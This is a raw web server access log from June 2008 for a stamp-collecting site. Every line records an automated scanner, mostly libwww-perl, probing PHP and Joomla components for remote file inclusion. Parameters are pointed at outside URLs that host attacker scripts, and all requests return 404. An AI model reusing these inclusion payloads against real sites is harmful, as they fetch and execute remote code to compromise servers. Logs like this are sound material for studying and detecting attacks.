88.191.75.245 - - [29/Jun/2008:19:05:55 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:19:06:01 -0700] "GET /logs/access_080505.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:19:06:02 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
74.53.196.178 - - [29/Jun/2008:19:06:14 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:19:06:52 -0700] "GET /logs/access_080428.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
69.89.31.88 - - [29/Jun/2008:19:06:57 -0700] "GET /logs/access_080602.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.89.31.88 - - [29/Jun/2008:19:06:57 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:19:07:45 -0700] "GET //include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.89.31.88 - - [29/Jun/2008:19:08:21 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
200.107.11.11 - - [29/Jun/2008:19:08:55 -0700] "GET /logs/access_080609.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:09:21 -0700] "GET /logs/access_080505.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:09:21 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:10:41 -0700] "GET /logs/access_080505.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:10:42 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:10:42 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:11:23 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:11:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:11:29 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:11:30 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:12:57 -0700] "GET /logs/access_080317.log//modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:12:57 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:12:57 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:13:04 -0700] "GET /logs/access_080317.log//modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:13:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:19:13:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:14:15 -0700] "GET /logs/access_080428.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:19:14:32 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:16:44 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:19:17:46 -0700] "GET /logs/access_080428.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:18:16 -0700] "GET /logs/access_080526.log/index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:18:17 -0700] "GET /index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:18:19 -0700] "GET /logs/access_080609.log/index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:19:29 -0700] "GET /logs/access_080526.log/index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:19:29 -0700] "GET /index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:19:30 -0700] "GET /logs/index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:19:40 -0700] "GET /logs/access_080609.log/index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:22:20 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
189.56.104.251 - - [29/Jun/2008:19:22:22 -0700] "GET /index.php?stranica=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.27.98 - - [29/Jun/2008:19:23:24 -0700] "GET /logs/access.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [29/Jun/2008:19:23:24 -0700] "GET /ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [29/Jun/2008:19:23:24 -0700] "GET /logs/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:25:54 -0700] "GET //com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.84.27.98 - - [29/Jun/2008:19:26:10 -0700] "GET /logs/access_080414.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:26:12 -0700] "GET /logs/access_080512.log//com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:26:12 -0700] "GET //com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:26:13 -0700] "GET /logs//com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:28:26 -0700] "GET /logs/access_080609.log//com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
203.155.1.251 - - [29/Jun/2008:19:28:53 -0700] "GET /logs/access.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [29/Jun/2008:19:28:54 -0700] "GET /ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [29/Jun/2008:19:28:55 -0700] "GET /logs/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:19:32:38 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:19:37:55 -0700] "GET /logs/access_080602.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:19:37:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:19:37:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.72.152 - - [29/Jun/2008:19:38:33 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [29/Jun/2008:19:39:42 -0700] "GET /logs/access_080414.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:19:39:51 -0700] "GET /logs/access_080609.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.72.152 - - [29/Jun/2008:19:41:20 -0700] "GET /logs/access_080602.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.194.72.152 - - [29/Jun/2008:19:41:20 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.194.72.152 - - [29/Jun/2008:19:41:20 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:19:41:30 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:19:41:56 -0700] "GET /logs/access_080512.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:19:41:57 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:19:41:58 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.194.72.152 - - [29/Jun/2008:19:43:00 -0700] "GET /logs/access_080609.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:43:19 -0700] "GET /logs/access_080526.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:43:20 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:19:43:20 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:19:53:37 -0700] "GET //include/write.php?dir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:19:53:38 -0700] "GET /logs//include/write.php?dir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.118.138.194 - - [29/Jun/2008:19:55:42 -0700] "GET /logs/access_080428.log/errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.118.138.194 - - [29/Jun/2008:19:55:42 -0700] "GET /errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.118.138.194 - - [29/Jun/2008:19:55:43 -0700] "GET /logs/errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.118.138.194 - - [29/Jun/2008:20:00:57 -0700] "GET /errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.118.138.194 - - [29/Jun/2008:20:05:41 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.112.193.46 - - [29/Jun/2008:20:21:01 -0700] "GET /logs/access_080428.log/errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.112.193.46 - - [29/Jun/2008:20:21:02 -0700] "GET /errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.112.193.46 - - [29/Jun/2008:20:21:02 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.112.193.46 - - [29/Jun/2008:20:26:18 -0700] "GET /errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.112.193.46 - - [29/Jun/2008:20:31:39 -0700] "GET /logs/access_080519.log/errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:32:11 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:32:11 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:32:12 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:04 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:04 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:04 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:05 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:06 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:34:06 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:36:16 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:36:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:36:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:20:40:24 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:20:40:24 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:20:40:24 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
77.48.71.72 - - [29/Jun/2008:20:42:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:44:01 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:44:02 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:44:05 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:44:05 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:46:19 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:46:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:47:27 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:47:28 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:48:15 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:48:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:48:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
